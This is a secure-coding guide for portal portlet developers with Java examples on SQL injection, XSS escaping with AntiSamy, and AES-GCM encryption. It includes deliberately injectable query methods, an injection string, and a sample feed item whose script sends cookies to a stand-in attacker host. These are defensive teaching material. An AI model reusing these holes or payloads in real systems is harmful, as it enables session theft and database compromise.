Security Information for Portlet Developers

SQL Injection

Most Jasig code uses Hibernate or Hibernate-backed JPA. These protect against SQL injection only when user input is bound as a query parameter; an HQL or JPQL string built by concatenating user input is just as injectable as raw SQL. Code which does not use these technologies should at least use prepared statements with bound parameters, never string concatenation.
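The following is an added example, not code from any Jasig portlet: a small DAO that shows the injectable pattern beside the bound-parameter form, both for plain JDBC and for Hibernate HQL. The table name NEWS, the column names and the NewsItem entity are assumptions for illustration.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
import org.hibernate.Session;

/** Hypothetical DAO; NEWS(TITLE, BODY) and the NewsItem entity are assumed. */
public class NewsDao {

    private final Connection conn;
    private final Session session;

    public NewsDao(Connection conn, Session session) {
        this.conn = conn;
        this.session = session;
    }

    /**
     * VULNERABLE: the title becomes part of the SQL text. A title of
     *   x' OR '1'='1
     * returns every row, and a title containing a semicolon may run a
     * second statement on drivers that allow batched statements.
     */
    public List<String> findBodiesUnsafe(String title) throws SQLException {
        String sql = "SELECT BODY FROM NEWS WHERE TITLE = '" + title + "'";
        List<String> bodies = new ArrayList<String>();
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(sql)) {
            while (rs.next()) {
                bodies.add(rs.getString("BODY"));
            }
        }
        return bodies;
    }

    /**
     * SAFE: the SQL text is fixed; the title travels to the database as a
     * bound parameter and can never change the statement's structure.
     */
    public List<String> findBodies(String title) throws SQLException {
        String sql = "SELECT BODY FROM NEWS WHERE TITLE = ?";
        List<String> bodies = new ArrayList<String>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, title);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    bodies.add(rs.getString("BODY"));
                }
            }
        }
        return bodies;
    }

    /**
     * VULNERABLE even though it is Hibernate: HQL assembled from user input
     * is rewritten to SQL with the injected text intact.
     */
    @SuppressWarnings("unchecked")
    public List<NewsItem> findItemsUnsafe(String title) {
        return session
            .createQuery("from NewsItem n where n.title = '" + title + "'")
            .list();
    }

    /** SAFE: HQL with a named parameter, bound by Hibernate. */
    @SuppressWarnings("unchecked")
    public List<NewsItem> findItems(String title) {
        return session
            .createQuery("from NewsItem n where n.title = :title")
            .setParameter("title", title)
            .list();
    }

    /** Assumed entity mapped to NEWS; only the fields the queries touch. */
    public static class NewsItem {
        public String title;
        public String body;
    }
}
```

The same rule applies to ORDER BY columns, table names and LIKE patterns: anything that cannot be bound as a parameter must be validated against a fixed allow-list before it is placed in the query text.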

Cross-site Scripting (XSS)

Many Jasig portlets make use of Spring's escapeBody JSP tag to perform HTML and JavaScript escaping of untrusted values before they are written into a view. Escape according to the context the value lands in: HTML escaping for element content and attributes, JavaScript escaping (in addition to HTML escaping) for values placed inside a script block.

The Manchester News Reader portlet uses OWASP AntiSamy to clean dangerous tags from RSS feeds. Escaping is not an option there, because feed items legitimately contain markup that must still render; AntiSamy instead parses the HTML and keeps only the tags and attributes permitted by a configurable policy file, so a developer can strip scripts, event handlers and other dangerous constructs from proxied content while preserving harmless formatting.
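The following is an added example illustrating both approaches above; it is not code from the Manchester News Reader or any other Jasig portlet. The escaping methods call the Spring utility classes that the escapeBody tag relies on, and the cleaning method uses the AntiSamy API against a policy file the caller supplies. The class name, the sample feed item and the policy stream are assumptions.

```java
import java.io.InputStream;
import java.util.List;
import org.owasp.validator.html.AntiSamy;
import org.owasp.validator.html.CleanResults;
import org.owasp.validator.html.Policy;
import org.owasp.validator.html.PolicyException;
import org.owasp.validator.html.ScanException;
import org.springframework.web.util.HtmlUtils;
import org.springframework.web.util.JavaScriptUtils;

/** Hypothetical helper: output encoding for views, tag cleaning for feeds. */
public final class PortletOutputSanitizer {

    private final Policy policy;
    private final AntiSamy antiSamy = new AntiSamy();

    /**
     * @param policyXml an AntiSamy policy file (for example one of the
     *        antisamy-*.xml samples shipped with the library); assumed to be
     *        supplied by the caller, e.g. from the portlet's classpath.
     */
    public PortletOutputSanitizer(InputStream policyXml) throws PolicyException {
        this.policy = Policy.getInstance(policyXml);
    }

    /** Untrusted text going into HTML element content or a quoted attribute. */
    public static String forHtml(String untrusted) {
        return HtmlUtils.htmlEscape(untrusted);
    }

    /**
     * Untrusted text going into a JavaScript string literal inside a
     * <script> block in an HTML page. HTML-escape first, then JS-escape:
     * this mirrors escapeBody with htmlEscape="true" javaScriptEscape="true".
     */
    public static String forScriptString(String untrusted) {
        return JavaScriptUtils.javaScriptEscape(HtmlUtils.htmlEscape(untrusted));
    }

    /**
     * Proxied HTML (an RSS item body) that must keep safe markup. Anything
     * the policy does not allow is removed rather than escaped.
     */
    public String cleanProxiedHtml(String untrustedHtml) throws ScanException, PolicyException {
        CleanResults results = antiSamy.scan(untrustedHtml, policy);
        // Worth logging: each message names something the policy stripped.
        List<String> removed = results.getErrorMessages();
        if (!removed.isEmpty()) {
            System.err.println("AntiSamy removed " + removed.size() + " item(s): " + removed);
        }
        return results.getCleanHTML();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample of a hostile feed item; not real feed data.
        String feedItem = "<p>Budget <b>approved</b></p>"
            + "<img src=\"x\" onerror=\"alert(document.cookie)\">"
            + "<script>location='http://evil.example/?c='+document.cookie</script>";

        // Attacker-chosen title rendered into the page twice.
        String title = "</script><script>alert(1)</script>";
        System.out.println("html   : " + forHtml(title));
        System.out.println("script : " + forScriptString(title));

        // Policy file location is an assumption; adjust to the portlet layout.
        try (InputStream policyXml = PortletOutputSanitizer.class
                .getResourceAsStream("/antisamy-policy.xml")) {
            PortletOutputSanitizer s = new PortletOutputSanitizer(policyXml);
            System.out.println("cleaned: " + s.cleanProxiedHtml(feedItem));
        }
    }
}
```

With a typical policy the cleaned output keeps the paragraph and bold text and drops the script element and the onerror handler. Treat the cleaned HTML as trusted for the view only; the original feed text must still be stored and re-cleaned if the policy changes.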

Encryption of sensitive data

Most portlets should not need to store user passwords at all; where a portlet must verify a password of its own, store a salted password hash rather than a reversible form. Encryption is for data the portlet has to read back later, such as credentials for a proxied back-end system or other sensitive user data. Use a well-vetted algorithm and mode (for example AES in an authenticated mode such as GCM), a key that is generated randomly and kept outside the database and source tree, and a fresh random IV for every value. Useful encryption libraries include Jasypt and Bouncy Castle; note that Jasypt's default algorithm is the dated PBEWithMD5AndDES, so configure it explicitly rather than relying on the default.
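The following is an added example using only the JCE that ships with the JDK, not code from any Jasig portlet or from Jasypt or Bouncy Castle. It encrypts a string under AES-GCM with a random per-value IV, prepends the IV to the ciphertext, and binds the result to a context string (here an assumed user name) so a value copied from one user's row cannot be decrypted under another's. The key is generated in memory for the demonstration; a real portlet would load it from protected configuration. AES-256 requires the unlimited-strength JCE policy on older JDKs; use a 128-bit key if that is not available.

```java
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

/** Hypothetical helper for reversible encryption of stored portlet data. */
public final class SensitiveDataCrypto {

    private static final String TRANSFORM = "AES/GCM/NoPadding";
    private static final int IV_BYTES = 12;   // 96-bit nonce recommended for GCM
    private static final int TAG_BITS = 128;  // full-length authentication tag
    private static final SecureRandom RNG = new SecureRandom();

    private final SecretKey key;

    public SensitiveDataCrypto(SecretKey key) {
        this.key = key;
    }

    /** Demo only: a real deployment loads the key from protected config. */
    public static SecretKey newRandomKey(int bits) throws GeneralSecurityException {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(bits);
        return kg.generateKey();
    }

    /** Returns base64(iv || ciphertext || tag); context is authenticated, not encrypted. */
    public String encrypt(String plaintext, String context) throws GeneralSecurityException {
        byte[] iv = new byte[IV_BYTES];
        RNG.nextBytes(iv);                      // never reuse an IV with the same key
        Cipher c = Cipher.getInstance(TRANSFORM);
        c.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(TAG_BITS, iv));
        c.updateAAD(context.getBytes(StandardCharsets.UTF_8));
        byte[] ct = c.doFinal(plaintext.getBytes(StandardCharsets.UTF_8));
        ByteBuffer out = ByteBuffer.allocate(iv.length + ct.length).put(iv).put(ct);
        return Base64.getEncoder().encodeToString(out.array());
    }

    /** Throws AEADBadTagException (a GeneralSecurityException) on any tampering or wrong context. */
    public String decrypt(String token, String context) throws GeneralSecurityException {
        byte[] in = Base64.getDecoder().decode(token);
        if (in.length < IV_BYTES + TAG_BITS / 8) {
            throw new GeneralSecurityException("token too short");
        }
        byte[] iv = Arrays.copyOfRange(in, 0, IV_BYTES);
        byte[] ct = Arrays.copyOfRange(in, IV_BYTES, in.length);
        Cipher c = Cipher.getInstance(TRANSFORM);
        c.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(TAG_BITS, iv));
        c.updateAAD(context.getBytes(StandardCharsets.UTF_8));
        return new String(c.doFinal(ct), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws Exception {
        SensitiveDataCrypto crypto = new SensitiveDataCrypto(newRandomKey(256));

        // Constructed sample: a back-end credential stored for user "alice".
        String token = crypto.encrypt("s3cret-api-token", "alice");
        System.out.println("stored : " + token);
        System.out.println("alice  : " + crypto.decrypt(token, "alice"));

        // Same ciphertext presented for a different user fails authentication.
        try {
            crypto.decrypt(token, "bob");
        } catch (GeneralSecurityException e) {
            System.out.println("bob    : rejected (" + e.getClass().getSimpleName() + ")");
        }
    }
}
```

Because GCM authenticates the ciphertext, a modified token fails outright instead of decrypting to garbage; that is the property a plain CBC or ECB mode, and Jasypt's default PBE algorithm, do not give you.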

Security resources